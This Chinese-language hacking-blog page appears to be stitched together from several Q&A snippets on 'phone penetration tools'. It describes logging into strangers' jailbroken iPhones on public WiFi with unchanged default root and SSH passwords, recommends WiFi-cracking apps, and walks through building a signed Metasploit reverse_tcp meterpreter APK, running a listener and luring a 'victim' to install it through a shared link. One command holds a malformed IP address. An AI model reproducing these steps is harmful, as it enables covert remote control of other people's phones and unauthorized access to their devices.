置顶

手机的渗透工具,手机渗透测试工具

作者:hacker | 分类:网络黑客 | 浏览:147 | 日期:2022年08月11日

目录:

如何利用wifi局域网渗透苹果手机

一:需要条件

1.在公共WIFI内登陆.

2.越狱的iPhone.(国内的iPhone基本都越狱了)

3.越狱的时候安装了openssh(基本越狱的都安装了.)

4.越狱后未修改root密码.(国内越狱的iPhone基本都没改密码)

二:使用putty登陆root

1.未修改过iphone地址的密码(国内越狱的iPhone基本都没改密码)

工具:91手机助手iphone版2.9.60.263 (必须使用2.9.60.263这个版本)

首先登陆路由器默认192.168.1.1 查看 客户端列表显示如下

ID客户端名 MAC 地址 IP 地址 有效时间

iPhone40 A6-D9-1D-XX 192.168.1.131 01:40:30

PC-201105282 2B-XX-XX-2E-32 192.168.1.100 01:30:56

none 24-AB-XX-XX-17-76 192.168.1.xxx 01:19:03

看到iphone的P地址显示为192.168.1.xxx

打开91手机助手iphone版2.9.60.263

选者使用wi-fi连接.然后会弹出一个窗口

Iphone地址: 192.168.1.xxx

密码: nd.com.cn (默认密码国内基本都没改)

好这样就已经连接到了对了,91手机助手下载电脑上,然后wifi连接手机

求一个可以抓包的手机Wifi软件

刚刚在kali NetHunter app store上找到一款贼厉害的安卓系统抓包软件,名字叫 Hijacker

下载链接:去re.nethunter.com/re掉po/中com.hijacker_3文2.apk

软件简介:Hijacker是用于渗透测试工具Aircrack-ng,Airodump-ng,MDK3和Reaver的图形用户界面。 它提供了一个简单易用的UI来使用这些工具,而无需在控制台中键入命令并复制和粘贴MAC地址。

此应用程序需要具有支持监视器模式的内部无线适配器的ARM android设备。 少数android设备可以运行,但本机都不可用。 这意味着您将需要自定义固件。 任何使用BCM4339芯片组(M *** 8974,例如Nexus 5,Xperia Z1 / Z2,LG G2,LG G Flex,三星Galaxy Note 3)的设备都可以与Nexmon(也支持其他一些芯片组)一起使用。 使用BCM4330的设备可以使用bcmon。

另一种选择是使用OTG电缆在Android中使用支持监视器模式的外部适配器。

从1.1版开始,包含了armv7l和aarch64设备所需的工具。 还包括用于BCM4339和BCM4358的Nexmon驱动程序和管理实用程序。

root访问也是必要的,因为这些工具需要root才能工作。

手机黑客工具箱:手机游戏

用dSploit把,局域网渗透软件手机上用的

安装教程:

使用教程:

手机渗透/修改wifi密码

1、打开浏览器,在地址栏输入路由器网关IP地址,用户名和密码一般如果你没改就是admin( 小写)

2、登录成功后就显示运行状态了,点击“无线设置”

3、再点击“无线安全设置”,无线 *** 名称(SSID),就是一个名字,你可以随便填,一般是字母+数字。 接下来就可以设置密码了,一般选择WPA-PSK/WPA2-PSK加密 *** (密码 要8-16个的,可以字母数字 组合)

4、设置密码后,点击保存,提示重启

5、最后点击“系统工具”里的“重启路由器”即可重启路由。

如何使用metasploit对安卓手机进行控制

在这次的实验中,我会使用kali linux和安卓模拟器演示如何使用Metasploit框架控制Android设备。

创建负载

我们需要两台虚拟机手机的渗透工具:Kali Linux和安卓模拟器。

打开vm启动Kali linux。接着打开终端,使用msfvenom *** android利用程序。

Msfvenom是msfpayload和msfencode的组合。它是一个单一的工具。它有标准的命令行选项。 Msfvenom用来制造的有效载荷用来渗透Android模拟器。

一旦打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件。

```

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1128 LPORT=4444 R /root/Desktop/pentest.apk

```

p 设置要使用的payload

LHOST 设置用来接收反弹连接的主机

LPORT 设置用来接收反弹连接的端口

R 设置文件格式

Location 要保存的文件位置

这个命令执行完之后,你会看到一些错误,但不用担心。现在可以到输出目录查看生成的apk手机的渗透工具了。

我们已经成功创建手机的渗透工具了Android格式(APK)文件的有效载荷。现在一般Android的移动设备不允许安装没有适当签名证书的应用程序。 Android设备只安装带有签署文件的APK。

我们可以使用如下工具进行手动签名手机的渗透工具

l Keytool (已安装)

l jar signer (已安装)

l zipalign (需要安装)

执行下列命令签名。首先使用密钥工具创建密钥库。

keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

`

然后使用JARsigner签名APK

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname`

再用JARsigner验证签名

jarsigner -verify -verbose -certs APPNAME.apk

`

Kali没有预装Zipalign,需要先apt-get install zipalign。然后用zipalign来验证apk。

zipalign -v 4 APPNAME.apk NEWAPPNAME.apk

现在我们有了一个带有签名的APK,它可以安装在任何设备上。

使用Metasploit进行测试

接下来启动metasploit的监听器。执行msfconsole打开控制台。

use exploit/multi/handler

Set PAYLOAD android/meterpreter/reverse_tcp

SET LHOST 192.168.152.128

SET LPORT 4444

Exploit

是时候将恶意的APK发送到手机上。我们这里使用一个网盘上传我们的APK,并将下载链接分享出去。

1、从下载android x86的iso。

2、使用vmware创建一个内核版本为2.6的虚拟机。

3、挂载镜像,启动虚拟机。

4、进入Live模式。

5、设置手机并登陆谷歌帐号。

在安卓模拟器里面点击那个链接并下载。我们已经发送了一封邮件到受害者的谷歌帐号上。

另外要允许安卓安装来历不明的apk。

切换回Kali,我们发现创建了一个新的会话。

然后你就可以为所欲为的操作这台“手机”了。

谁有安卓WiFi渗透工具,如dsploit之类的。网盘盘/网站。

手机破权后在互联网上下载软件即可手机的渗透工具,或者WIFI万能钥匙

发表评论

访客 游客 2022-08-11 · 回复该评论
、进入Live模式。5、设置手机并登陆谷歌帐号。在安卓模拟器里面点击那个链接并下载。我们已经发送了一封邮件到受害者的谷歌帐号上。另外要允许安卓安装来历不明的apk。切换回Kali,我们发现创建了一个新的

访客 游客 2022-08-11 · 回复该评论
个可以抓包的手机Wifi软件刚刚在kali NetHunter app store上找到一款贼厉害的安卓系统抓包软件,名字叫 Hijacker下载链接:去re.nethunter

访客 游客 2022-08-11 · 回复该评论
密码后,点击保存,提示重启 5、最后点击“系统工具”里的“重启路由器”即可重启路由。如何使用metasploit对安卓手机进行控制在这次的实验中,我会使用kali linux和安卓模拟器演示如何使用Metasploit框架控制Android设备。创建负载我们

取消
微信二维码
支付宝二维码